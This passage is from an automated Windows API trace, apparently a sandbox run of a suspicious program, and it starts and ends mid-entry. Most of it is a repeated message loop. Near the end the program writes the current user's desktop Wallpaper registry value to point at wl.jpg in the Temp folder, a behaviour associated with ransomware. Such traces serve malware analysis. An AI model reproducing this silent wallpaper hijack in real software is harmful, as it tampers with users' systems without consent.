lpMsg=0x8bf7a0) returned 0 [0299.070] Sleep (dwMilliseconds=0xa) [0299.084] timeGetTime () returned 0x4abc7 [0299.084] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.084] Sleep (dwMilliseconds=0xa) [0299.099] timeGetTime () returned 0x4abd7 [0299.099] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.099] Sleep (dwMilliseconds=0xa) [0299.115] timeGetTime () returned 0x4abe7 [0299.115] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.115] Sleep (dwMilliseconds=0xa) [0299.130] timeGetTime () returned 0x4abf6 [0299.130] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.130] Sleep (dwMilliseconds=0xa) [0299.147] timeGetTime () returned 0x4ac06 [0299.147] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.147] Sleep (dwMilliseconds=0xa) [0299.161] timeGetTime () returned 0x4ac15 [0299.162] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.162] Sleep (dwMilliseconds=0xa) [0299.177] timeGetTime () returned 0x4ac25 [0299.177] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.177] Sleep (dwMilliseconds=0xa) [0299.195] timeGetTime () returned 0x4ac35 [0299.196] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.196] Sleep (dwMilliseconds=0xa) [0299.208] timeGetTime () returned 0x4ac44 [0299.208] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.208] Sleep (dwMilliseconds=0xa) [0299.224] timeGetTime () returned 0x4ac54 [0299.224] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.224] Sleep (dwMilliseconds=0xa) [0299.240] timeGetTime () returned 0x4ac63 [0299.240] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.240] Sleep (dwMilliseconds=0xa) [0299.256] timeGetTime () returned 0x4ac73 [0299.256] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.256] Sleep (dwMilliseconds=0xa) [0299.271] timeGetTime () returned 0x4ac83 [0299.271] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.271] Sleep (dwMilliseconds=0xa) [0299.286] timeGetTime () returned 0x4ac92 [0299.286] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.286] Sleep (dwMilliseconds=0xa) [0299.302] timeGetTime () returned 0x4aca2 [0299.302] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.302] Sleep (dwMilliseconds=0xa) [0299.318] timeGetTime () returned 0x4acb1 [0299.318] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.318] Sleep (dwMilliseconds=0xa) [0299.333] timeGetTime () returned 0x4acc1 [0299.333] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.333] Sleep (dwMilliseconds=0xa) [0299.349] timeGetTime () returned 0x4acd1 [0299.349] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.349] Sleep (dwMilliseconds=0xa) [0299.364] timeGetTime () returned 0x4ace0 [0299.365] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.365] Sleep (dwMilliseconds=0xa) [0299.380] timeGetTime () returned 0x4acf0 [0299.380] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.380] Sleep (dwMilliseconds=0xa) [0299.396] timeGetTime () returned 0x4acff [0299.396] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.396] Sleep (dwMilliseconds=0xa) [0299.411] timeGetTime () returned 0x4ad0f [0299.411] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.411] Sleep (dwMilliseconds=0xa) [0299.427] timeGetTime () returned 0x4ad1f [0299.427] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.427] Sleep (dwMilliseconds=0xa) [0299.442] timeGetTime () returned 0x4ad2e [0299.442] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.442] Sleep (dwMilliseconds=0xa) [0299.458] timeGetTime () returned 0x4ad3e [0299.458] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.458] Sleep (dwMilliseconds=0xa) [0299.474] timeGetTime () returned 0x4ad4d [0299.474] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.474] Sleep (dwMilliseconds=0xa) [0299.489] timeGetTime () returned 0x4ad5d [0299.489] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.489] Sleep (dwMilliseconds=0xa) [0299.505] timeGetTime () returned 0x4ad6d [0299.505] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.505] Sleep (dwMilliseconds=0xa) [0299.520] timeGetTime () returned 0x4ad7c [0299.520] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.520] Sleep (dwMilliseconds=0xa) [0299.536] timeGetTime () returned 0x4ad8c [0299.536] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.536] Sleep (dwMilliseconds=0xa) [0299.552] timeGetTime () returned 0x4ad9b [0299.552] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.552] Sleep (dwMilliseconds=0xa) [0299.567] timeGetTime () returned 0x4adab [0299.567] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.567] Sleep (dwMilliseconds=0xa) [0299.583] timeGetTime () returned 0x4adbb [0299.583] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.583] Sleep (dwMilliseconds=0xa) [0299.598] timeGetTime () returned 0x4adca [0299.598] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.599] Sleep (dwMilliseconds=0xa) [0299.614] timeGetTime () returned 0x4adda [0299.614] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.614] Sleep (dwMilliseconds=0xa) [0299.630] timeGetTime () returned 0x4ade9 [0299.630] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.630] Sleep (dwMilliseconds=0xa) [0299.645] timeGetTime () returned 0x4adf9 [0299.645] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.645] Sleep (dwMilliseconds=0xa) [0299.661] timeGetTime () returned 0x4ae09 [0299.661] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.661] Sleep (dwMilliseconds=0xa) [0299.676] timeGetTime () returned 0x4ae18 [0299.676] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.676] Sleep (dwMilliseconds=0xa) [0299.692] timeGetTime () returned 0x4ae28 [0299.692] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.692] Sleep (dwMilliseconds=0xa) [0299.707] timeGetTime () returned 0x4ae37 [0299.708] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.708] Sleep (dwMilliseconds=0xa) [0299.723] timeGetTime () returned 0x4ae47 [0299.723] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.723] Sleep (dwMilliseconds=0xa) [0299.739] timeGetTime () returned 0x4ae57 [0299.739] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.739] Sleep (dwMilliseconds=0xa) [0299.754] timeGetTime () returned 0x4ae66 [0299.754] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.755] Sleep (dwMilliseconds=0xa) [0299.770] timeGetTime () returned 0x4ae76 [0299.770] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.770] Sleep (dwMilliseconds=0xa) [0299.786] timeGetTime () returned 0x4ae85 [0299.786] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.786] Sleep (dwMilliseconds=0xa) [0299.801] timeGetTime () returned 0x4ae95 [0299.801] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0299.801] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0299.801] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0299.802] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0299.802] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0299.802] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.802] Sleep (dwMilliseconds=0xa) [0299.818] timeGetTime () returned 0x4aea5 [0299.818] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.818] Sleep (dwMilliseconds=0xa) [0299.832] timeGetTime () returned 0x4aeb4 [0299.832] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.832] Sleep (dwMilliseconds=0xa) [0299.848] timeGetTime () returned 0x4aec4 [0299.848] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.848] Sleep (dwMilliseconds=0xa) [0299.865] timeGetTime () returned 0x4aed3 [0299.865] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.865] Sleep (dwMilliseconds=0xa) [0299.879] timeGetTime () returned 0x4aee3 [0299.879] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.879] Sleep (dwMilliseconds=0xa) [0299.895] timeGetTime () returned 0x4aef3 [0299.895] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.895] Sleep (dwMilliseconds=0xa) [0299.911] timeGetTime () returned 0x4af02 [0299.911] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.911] Sleep (dwMilliseconds=0xa) [0299.926] timeGetTime () returned 0x4af12 [0299.926] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.926] Sleep (dwMilliseconds=0xa) [0299.942] timeGetTime () returned 0x4af21 [0299.942] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.942] Sleep (dwMilliseconds=0xa) [0299.960] timeGetTime () returned 0x4af31 [0299.961] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.961] Sleep (dwMilliseconds=0xa) [0299.973] timeGetTime () returned 0x4af41 [0299.973] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.973] Sleep (dwMilliseconds=0xa) [0299.988] timeGetTime () returned 0x4af50 [0299.989] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0299.989] Sleep (dwMilliseconds=0xa) [0300.004] timeGetTime () returned 0x4af60 [0300.004] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.004] Sleep (dwMilliseconds=0xa) [0300.020] timeGetTime () returned 0x4af6f [0300.020] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.020] Sleep (dwMilliseconds=0xa) [0300.035] timeGetTime () returned 0x4af7f [0300.035] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0300.035] Sleep (dwMilliseconds=0xa) [0300.051] timeGetTime () returned 0x4af8f [0300.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0300.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0300.051] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0300.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0300.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0300.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0300.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0300.052] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0300.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0300.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0300.053] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0300.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0300.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0300.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0300.055] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0300.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0300.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0300.055] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0300.055] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0300.055] RegCloseKey (hKey=0x294) returned 0x0 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0300.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0300.055] HeapFree (in: hHeap=0x25c0000, 